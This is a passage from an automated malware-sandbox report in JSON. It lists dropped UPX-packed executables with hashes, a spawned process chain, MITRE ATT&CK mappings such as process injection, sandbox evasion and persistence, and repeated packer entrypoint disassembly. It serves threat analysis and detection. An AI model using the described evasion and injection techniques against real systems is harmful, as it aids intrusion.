"927fc0153af2f275eccf63d41dbc2f7d42aae4aaa43fb72c9cfbe24ffbda96e0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dlvbt.exe", "file_size": 343995, "sha256": "7c8eb3a9a568cba68fadae33179dfe53d6018c09307a4e2dadafdaa013a02d16", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pfftl.exe", "file_size": 343985, "sha256": "bcae0c20e0886dcc4e31b5816af6f546a67cef6e3f133e0df67afc594e292754", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005476", "name": "edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe", "normalized_path": "C:\\edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe", "sha256": "edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0"}, {"uid": "00000000-00005352", "parentuid": "00000000-00005476", "name": "242680.exe", "normalized_path": "c:\\242680.exe", "sha256": "088c8e57a20366a64b93bd847b9ede93da85d5c04c75c9eefd716ab866c56257"}, {"uid": "00000000-00003928", "parentuid": "00000000-00005352", "name": "06484.exe", "normalized_path": "c:\\06484.exe", "sha256": "e70d283df54e428fd29ab49669a843ece5c7648185d4e1b39697bf9a447d9f03"}, {"uid": "00000000-00004268", "parentuid": "00000000-00003928", "name": "26802.exe", "normalized_path": "c:\\26802.exe", "sha256": "79b03795a8b45c10e3adc0e38b9b9e4d2d51db00c4468fe18f451f603c346191"}, {"uid": "00000000-00005168", "parentuid": "00000000-00004268", "name": "06224.exe", "normalized_path": "c:\\06224.exe", "sha256": "25a06ed5bc2596bcd131d2eccba1813ea5483ff43b03f8105d6cb4fa6d2c319d"}, {"uid": "00000000-00005188", "parentuid": "00000000-00005168", "name": "xrnbdjd.exe", "normalized_path": "c:\\xrnbdjd.exe", "sha256": "855751bdde347dbb3a72b4fc2babe07dbc65d4b89e3fcadd030825770e2dcca0"}, {"uid": "00000000-00002220", "parentuid": "00000000-00005188", "name": "njljtn.exe", "normalized_path": "c:\\njljtn.exe", "sha256": "38567e3f355181f9ae70ea5a709cb0733b0ddf596238cf5978771c2d61d87db5"}, {"uid": "00000000-00002116", "parentuid": "00000000-00002220", "name": "xvdbp.exe", "normalized_path": "c:\\xvdbp.exe", "sha256": "52426c29dcb823fe3280c0b8f98cd818cbdf70b21acd073fb3e71bf8c3fcd5f4"}, {"uid": "00000000-00005664", "parentuid": "00000000-00002116", "name": "plfthj.exe", "normalized_path": "c:\\plfthj.exe", "sha256": "d073c639a524785c8f26073cd3266a8f15e8036467320b605eee71e09586981a"}, {"uid": "00000000-00004648", "parentuid": "00000000-00005664", "name": "jrfxlf.exe", "normalized_path": "c:\\jrfxlf.exe", "sha256": "da1c2b861b3ac7d460b191a29714c8b70b7e8f6385fb96f81362abf37f0199be"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fvxfr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fpnhxpp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dlnbh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jfjjpnn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bttxlfh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hlphd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"8664860.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"868480.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"44822.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"06066.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lxvrdvn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dlvbt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pfftl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hfrvlvv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tfjtht.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"02488.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"24026.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"020286.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fnttpf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lpftbf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bhbtd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vtbthnv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hbrjl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bnvxpv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fvxfr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fpnhxpp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dlnbh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jfjjpnn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bttxlfh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hlphd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"8664860.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"868480.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"44822.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"06066.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lxvrdvn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dlvbt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pfftl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hfrvlvv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tfjtht.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"02488.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 